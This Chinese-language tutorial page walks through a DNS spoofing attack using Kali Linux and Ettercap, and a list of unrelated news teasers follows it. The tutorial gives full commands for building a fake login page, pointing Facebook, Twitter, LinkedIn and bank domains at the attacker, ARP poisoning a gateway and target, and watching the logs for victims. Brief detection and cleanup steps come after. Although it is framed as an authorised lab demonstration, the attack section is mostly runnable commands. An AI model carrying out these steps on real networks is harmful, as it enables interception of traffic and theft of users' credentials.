DNS欺骗攻击演示(仅供合法授权测试)
【点这里】完整视频版环境准备与免责声明重要警告仅用于渗透测试演示必须在您完全拥有控制权的隔离实验室环境中操作建议使用虚拟机环境Kali Linux攻击机 Windows/Linux目标机在未授权的网络上进行此操作是非法的演示环境配攻击机Kali Linux (IP: 192.168.1.100) 目标机Windows 10 (IP: 192.168.1.50) 网关192.168.1.1 网络隔离的虚拟局域网步骤1准备攻击环境# 1.1 更新系统并安装必要工具 sudo apt update sudo apt install -y apache2 ettercap-graphical dsniff # 1.2 启动Apache服务器创建钓鱼页面 sudo systemctl start apache2 sudo systemctl enable apache2 # 1.3 创建简单的钓鱼页面 echo htmlbodyh1Important: Please Login/h1formUsername: input typetextbrPassword: input typepasswordbrinput typesubmit valueLogin/formpThis is a simulated phishing page for educational purposes./p/body/html | sudo tee /var/www/html/index.html # 1.4 查看本机IP地址用于DNS欺骗重定向 ip addr show | grep inet # 假设Kali IP为192.168.1.100步骤2配置DNS欺骗# 2.1 备份原始etter.dns配置文件 sudo cp /etc/ettercap/etter.dns /etc/ettercap/etter.dns.bak # 2.2 编辑DNS欺骗规则文件 sudo nano /etc/ettercap/etter.dns # 添加以下内容将目标域名指向您的Kali IP *.facebook.com A 192.168.1.100 *.twitter.com A 192.168.1.100 *.linkedin.com A 192.168.1.100 *.examplebank.com A 192.168.1.100 # 星号(*)表示所有子域名都重定向 # 保存并退出 (CtrlX, Y, Enter)步骤3启用IP转发功能# 3.1 启用IP转发使Kali能够转发流量作为中间人 echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward # 3.2 添加iptables规则将HTTP流量重定向到Apache sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 80步骤4使用Ettercap进行ARP欺骗和DNS欺骗# 4.1 启动Ettercap图形界面 sudo ettercap -G在Ettercap图形界面中操作【点这里】完整视频版选择网卡Sniff - Unified Sniffing - 选择您的网络接口 (如eth0)扫描网络主机Hosts - Scan for hosts 等待扫描完成查看主机列表Hosts - Hosts list您会看到类似列表192.168.1.1 [网关]192.168.1.50 [目标机]192.168.1.100 [您的Kali]设置目标将网关 (192.168.1.1) 添加到 Target 1将目标机 (192.168.1.50) 添加到 Target 2开始ARP欺骗Mitm - ARP poisoning ✔️ 勾选 Sniff remote connections 点击 OK启用DNS欺骗插件Plugins - Manage plugins 双击 dns_spoof 以启用开始攻击Start - Start sniffing步骤5验证攻击效果CMD# 5.1 清除DNS缓存 ipconfig /flushdns # 5.2 测试DNS解析 nslookup facebook.com # 正常情况下应返回 Facebook 的真实IP # 攻击后应返回 192.168.1.100 (您的Kali IP) # 5.3 尝试访问被欺骗的网站 # 打开浏览器访问http://facebook.com # 应该会看到您在Kali上创建的钓鱼页面步骤6监控攻击流量在攻击机Kali上查看攻击效果# 6.1 查看Apache访问日志实时监控 sudo tail -f /var/log/apache2/access.log # 6.2 查看DNS查询记录 sudo ettercap -Tq -i eth0 # 按 h 查看帮助d 显示DNS欺骗活动 # 6.3 使用tcpdump监控DNS流量 sudo tcpdump -i eth0 port 53 -v步骤7防御检测演示在目标机上检测攻击CMD# 7.1 检查ARP表发现异常 arp -a # 注意网关的MAC地址应该与Kali的MAC地址相同这是ARP欺骗的证据 # 7.2 使用静态ARP条目防御 arp -s 192.168.1.1 [真实的网关MAC地址] # 7.3 使用安全DNSDNS over HTTPS # 在浏览器中启用DoH如使用Cloudflare: https://1.1.1.1/dns/步骤8清理和恢复# 8.1 停止Ettercap攻击 # 在Ettercap界面Stop - Stop sniffing # 或按 CtrlC 退出 # 8.2 停止Apache服务 sudo systemctl stop apache2 # 8.3 恢复IP转发设置 echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward # 8.4 清除iptables规则 sudo iptables -t nat -F # 8.5 恢复原始etter.dns配置 sudo cp /etc/ettercap/etter.dns.bak /etc/ettercap/etter.dns # 8.6 在目标机上恢复ARP表 arp -d *【点这里】完整视频版希望本次演示不仅为您揭示了网络威胁的一面更启发了您对安全架构设计的思考。真正的网络安全始于对攻击的深刻理解最终落于对信任体系的坚实捍卫。

相关新闻

政务系统安全升级:免费国密SSL证书部署指南

政务系统安全升级:免费国密SSL证书部署指南

政务系统作为关键信息基础设施,部署国密SSL证书是满足《密码法》等合规要求、防范数据泄露风险的核心举措。2026年,国内数字证书平台已实现政务网站免费国密SSL证书的申请与部署闭环,以下为详细实操指南。 一、国密SSL证书适配与合规必要性 …

2026/7/6 1:47:34 阅读更多 →
【】How-To: Using the N* stack, part

【】How-To: Using the N* stack, part

赏荚锹骨EasySQLite 是一个 .NET 9 操作 SQLite 入门到实战详细教程,主要是对学校班级,学生信息进行管理维护。本文的主要内容是将 EasySQLite 项目解决方案文件格式从 .sln 格式升级为更简洁的 .slnx 格式。 GitHub开源地址:https://github.…

2026/7/6 9:42:29 阅读更多 →
2026年印刷废气治理厂家深度观察与选型指南

2026年印刷废气治理厂家深度观察与选型指南

随着“双碳”战略深入与环保政策收紧,工业废气治理已从企业的“成本包袱”转变为关乎绿色生存的核心命题。在包装印刷、软包装等领域,因VOCs组分复杂、风量波动大,一直是大气治理的重点。行业预测显示,2026年中国工业废气处理市场…

2026/7/7 13:34:26 阅读更多 →

最新新闻

学习Python编程3,变量

学习Python编程3,变量

电脑内存中的命名位置用来存储值,就像一个存储多种不同类型数据的容器,数值,字符串,布尔值语法:命名,使用赋值操作符赋值。命名规范使用小写字母。使用下划线分隔单词。使用有意义的名字。使用单数名词。代…

2026/7/8 6:58:59 阅读更多 →
2026电脑视频提取音频全指南:在线网站、Windows/Mac,免费工具实操教程

2026电脑视频提取音频全指南:在线网站、Windows/Mac,免费工具实操教程

2026 年日常办公、短视频剪辑、课程录音整理场景中,经常需要单独提取视频内的音频素材,不同电脑系统、使用场景对应不同处理方案。本文整合在线网页工具、Windows 专属软件、Mac 原生工具、微信小程序、专业命令工具五类方案,全部为免费可用方…

2026/7/8 6:56:58 阅读更多 →
c++初阶入门(引用,引用的特性,引用的使用,引用的使用)

c++初阶入门(引用,引用的特性,引用的使用,引用的使用)

目录 引用 引用的特性 引用的使用 const 引用 权限缩小(合法) 权限放大(非法) 引用 引用不是新定义一个变量,而是给已存在变量取了一个别名,编译器不会为引用变量开辟内存空间,它和它引用…

2026/7/8 6:54:58 阅读更多 →
OpenAI API 上下文窗口超限排查:3 种常见错误与 5 步精准计算法

OpenAI API 上下文窗口超限排查:3 种常见错误与 5 步精准计算法

OpenAI API 上下文窗口超限排查:3 种常见错误与 5 步精准计算法 调用 OpenAI API 时,开发者最常遇到的错误之一就是上下文窗口超限。当输入的 token 数量超过模型限制时,API 会返回 context_length_exceeded 错误,导致请求失败。…

2026/7/8 6:54:58 阅读更多 →
QQ截图独立版:无需登录的专业级截图工具全解析

QQ截图独立版:无需登录的专业级截图工具全解析

QQ截图独立版:无需登录的专业级截图工具全解析 【免费下载链接】QQScreenShot 电脑QQ截图工具提取版,支持文字提取、图片识别、截长图、qq录屏。默认截图文件名为ScreenShot日期 项目地址: https://gitcode.com/gh_mirrors/qq/QQScreenShot 还在为每次截图都…

2026/7/8 6:54:58 阅读更多 →
Windows APK安装器架构深度解析:从跨平台适配到权限管理

Windows APK安装器架构深度解析:从跨平台适配到权限管理

Windows APK安装器架构深度解析:从跨平台适配到权限管理 【免费下载链接】APK-Installer An Android Application Installer for Windows 项目地址: https://gitcode.com/GitHub_Trending/ap/APK-Installer 在移动应用生态与桌面系统日益融合的今天&#xff…

2026/7/8 6:52:58 阅读更多 →

日新闻

3大核心能力重塑《明日方舟》游戏体验:MAA自动化助手的革命性突破

3大核心能力重塑《明日方舟》游戏体验:MAA自动化助手的革命性突破

3大核心能力重塑《明日方舟》游戏体验:MAA自动化助手的革命性突破 【免费下载链接】MaaAssistantArknights 《明日方舟》小助手,全日常一键长草!| A one-click tool for the daily tasks of Arknights, supporting all clients. 项目地址: …

2026/7/8 0:00:48 阅读更多 →
MyBatis 批量操作深度优化——从 N+1 到批处理的全路径

MyBatis 批量操作深度优化——从 N+1 到批处理的全路径

MyBatis 批量操作深度优化——从 N1 到批处理的全路径 一、从"功能正确"到"性能可接受"——MyBatis 批量操作的三段式进化 MyBatis 在日常增删改查场景中几乎是无感的——实体映射直观、SQL 控制灵活。但当数据量从千级上升到十万级、百万级,许…

2026/7/8 0:00:48 阅读更多 →
工业负载控制方案:TPD2015FN与PIC18F45K22应用解析

工业负载控制方案:TPD2015FN与PIC18F45K22应用解析

1. 工业负载控制方案概述在工业自动化、电机驱动和照明控制等高需求场景中,可靠地控制电感和电阻负载是核心挑战之一。TPD2015FN作为东芝的8通道高端智能功率开关IC,配合PIC18F45K22微控制器,能够构建一套稳定、高效的负载控制系统。这套组合…

2026/7/8 0:02:48 阅读更多 →

周新闻

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容 【免费下载链接】BiliTools A cross-platform bilibili toolbox. 跨平台哔哩哔哩工具箱,支持下载视频、番剧等等各类资源 项目地址: https://gitcode.com/GitHub_Trending/bilit/BiliTools …

2026/7/7 14:24:45 阅读更多 →
威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型的陌生现状在忙碌疲惫的一天里,参与了关于混合后量子密码学的讨论,应付端点攻击找茬的人,还参与留言板讨论后,发现“威胁模型”对多数人仍是陌生概念,且多被当作时髦用语。有趣的相关画作有一幅由 Embyr 创作的…

2026/7/7 12:34:47 阅读更多 →
渗透测试入门指南:从零基础到实战环境搭建

渗透测试入门指南:从零基础到实战环境搭建

1. 从“看热闹”到“入门”:我理解的渗透测试到底是什么?每次看到新闻里说某个大公司的数据被“黑”了,或者某个网站被攻击导致服务瘫痪,你是不是和我一样,心里会冒出两个念头:一是“这黑客真厉害”&#x…

2026/7/7 15:59:06 阅读更多 →

月新闻